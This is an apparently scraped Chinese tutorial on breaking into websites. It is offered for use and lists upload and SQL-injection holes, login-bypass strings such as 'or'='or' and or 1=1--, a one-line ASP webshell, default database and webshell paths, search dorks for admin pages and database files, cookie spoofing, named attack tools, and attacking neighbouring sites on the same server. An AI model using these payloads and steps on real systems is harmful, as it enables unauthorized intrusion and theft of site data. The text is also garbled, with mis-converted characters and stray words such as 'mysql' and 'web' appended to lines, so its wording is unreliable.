如何去***一个网站?

首先,观察指定网站。                                           html

***指定网站是须要条件的:
要先观察这个网站是动态仍是静态的。
首先介绍下什么样站点能够***:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点
若是是静态的(.htm或html),通常是不会成功的。若是要***的目标网站是动态的,就能够利用动态网站的漏洞进行***。mysql

Quote:
如下是***网站经常使用方法:
1.上传漏洞
若是看到:选择你要上传的文件 [从新上传]或者出现“请登录后使用”,80%就有漏洞了!
有时上传不必定会成功,这是由于Cookies不同.咱们就要用WSockExpert取得Cookies.再用DOMAIN上传. web

2.注入漏洞
字符过滤不严形成的sql

3.暴库:把二级目录中间的/换成%5c 
 
 
4.’or’=’or’这是一个能够链接SQL的语名句.能够直接进入后台。我收集了一下。相似的还有:
 ’or’’=’ " or "a"="a   ’) or (’a’=’a   ") or ("a"="a  or 1=1--  ’ or ’a’=’a
5.社会工程学。这个咱们都知道吧。就是猜解。
 
6.写入ASP格式数据库。就是一句话***〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀)
  
7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.
好比:默认数据库,默认后台地址,默认管理员账号密码等
   
8.默认数据库/webshell路径利用:这样的网站不少/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:网站猎手 挖掘鸡 明小子shell

9.查看目录法:一些网站能够断开目录,能够访问目录。
210.37.95.65 p_w_picpaths
10.工具溢出
      
11.搜索引擎利用:
 
(1).inurl:flasher_list.asp  默认数据库:database/flash.mdb  后台/manager/
(2).找网站的管理后台地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理  〈关键字不少,自已找〉
site:xxxx.cominurl:login
(3).查找access的数据库,mssql、mysql的链接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb数据库

12.COOKIE诈骗:把本身的ID修改为管理员的,MD5密码也修改为他的,用桂林老兵工具能够修改COOKIE。服务器

13.利用常见的漏洞:如动网BBS
能够先用:dvbbs权限提高工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已作。咱们能够用WSockExpert取得Cookies/NC包
这个我就不作了,网上教程多的是,自已下个看看。
工具:dvbbs权限提高工具  动网固顶贴工具
14.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE
  CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。
 网络

#######################################
       
         通常***思路    
       脚本注入(ASP PHP JSP)
1.脚本漏洞   
       其它脚本漏洞(上传漏洞,跨站漏洞等) 
        
         
      域名旁注   
2.旁注     
      “IP”旁注ide

      本地溢出
3.溢出漏洞 
      远程溢出工具

      ARP欺骗
4.网络窃听
      IP欺骗

5.社会工程学(社会工程实际上是心理学)
简单的说,能够利用以上方法来***,若是这个指定网站的确没有漏洞,还能够利用其它方式。。。
#######################################
〓通往电脑的路不止一条〓
若是目标网站程序没有漏洞,能够按照如下方法:
首先判断对方网站服务器主机的IP地址,好比:ping www.baidu.com,就能够获得百度网站的服务器IP地址,固然也能够利用旁注等工具来查询目标网站服务器的IP地址。。。 能够试着***目标网站所在的服务器,能够用旁注工具来查询这个服务器上都放了多少个网站。。。 若是目标网站没有漏洞,能够试着***同服务器上的其它网站。。。若是可以***同服务器上的其它网站,就能够得到权限,看能不可以提权拿到服务器等。 也能够直接***这台网站的服务器! 好比:用IP端口扫描软件,扫描一下目标服务器都开放了哪些端口,而后利用开放的漏洞端口进行***。常见漏洞端口如何***,已经有不少这方面的资料了。还能够查询目标服务器有哪些漏洞,好比微软最新Oday漏洞,利用漏洞拿到服务器权限。******,让网站主机感染你的***。主要是看目标网站服务器系统是否存在漏洞。

相关文章
相关标签/搜索